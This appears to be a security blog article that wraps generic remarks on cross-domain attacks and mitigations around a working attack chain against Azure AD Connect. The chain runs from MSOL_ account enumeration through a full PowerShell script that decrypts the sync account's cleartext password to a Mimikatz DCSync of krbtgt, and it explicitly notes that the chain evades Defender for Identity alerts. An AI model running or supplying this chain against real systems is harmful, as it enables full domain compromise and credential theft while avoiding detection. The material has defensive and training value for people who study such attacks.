Cross Domain Attacks with Azure AD Integration

Introduction to Cross Domain Attacks

Cross domain attacks are a significant threat in today’s interconnected digital environment. These attacks exploit the trust relationships between different internet domains to gain unauthorized access to sensitive information or services. With the increasing use of cloud solutions, such as Azure Active Directory (Azure AD), understanding and mitigating these attacks has become essential for maintaining robust security.

How Azure AD Integration Works

Azure AD is a comprehensive identity and access management solution for Microsoft’s Azure cloud services. It enables users to access various resources with a single set of credentials, facilitating seamless and secure connections across different domains. However, the integration of multiple domains introduces unique vulnerabilities that can be exploited if not managed properly.

Common Cross Domain Attack Techniques

Several techniques can be employed in cross domain attacks, such as Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), and security misconfigurations. These techniques can manipulate legitimate credentials and tokens used in Azure AD to access unauthorized domains or applications.

Mitigation Strategies

To protect against cross domain attacks, it is crucial to implement several mitigation strategies. These include regularly updating and patching systems, using strong authentication protocols, and regularly reviewing and auditing access controls. Specifically for Azure AD, implementing conditional access policies and Multi-Factor Authentication (MFA) can significantly reduce the risk of these attacks.

Methodology

1. Enumerate the users accounts who have MSOL_ attribute identity.
2. Start a process with the priv of that user
3. Execute adconnect ps1 script, this will provide the creds of the user
4. Connect using runas and perform a DCSync Attack

PowerShell

1. Enumerate the PHS account and server where AD Connect is installed

# Powerview
Get-DomainUser -Identity "MSOL_*" -Domain techcorp.local

# AD Module
Get-ADUser -Filter "samAccountName -like 'MSOL_*'" - Server techcorp.local -Properties * | select SamAccountName,Description | fl

2. Dump the creds of the user and logon

With administrative privileges, if we run adconnect.ps1, we can extract the credentials of the MSOL_ account used by AD Connect in clear-text Note: Adconnect.ps1 script’s code runs powershell.exe so verbose logs (like transcripts) will be there.

# Adconnect
. .\adconnect.ps1
adconnect

# Runas that user
runas /user:techcorp.local\MSOL_16fb75d0227d /netonly cmd

3. Execute the DCSync attack

Please note that because AD Connect synchronizes hashes every two minutes, in an Enterprise Environment, the MSOL_ account will be excluded from tools like MDI! This will allow us to run DCSync without any alerts!

Invoke-Mimikatz -Command '"lsadump::dcsync /user:us\krbtgt"'

Invoke-Mimikatz -Command '"lsadump::dcsync /user:techcorp\krbtgt /domain:techcorp.local"'

Abusing Azure AD Connect

Run the following script

Write-Host "AD Connect Sync Credential Extract POC (@_xpn_)`n"

#$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=127.0.0.1;Database=ADSync;Integrated Security=True"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()

$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()

add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)

$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}

Write-Host ("Domain: " + $domain.Domain)
Write-Host ("Username: " + $username.Username)
Write-Host ("Password: " + $password.Password)

Conclusion

Cross domain attacks pose a serious threat to any organization relying on integrated cloud services. Thus, a thorough understanding of these threats and the implementation of robust mitigation strategies are vital for maintaining security.

With Azure AD integration, safeguarding sensitive information requires diligent monitoring and proactive security measures.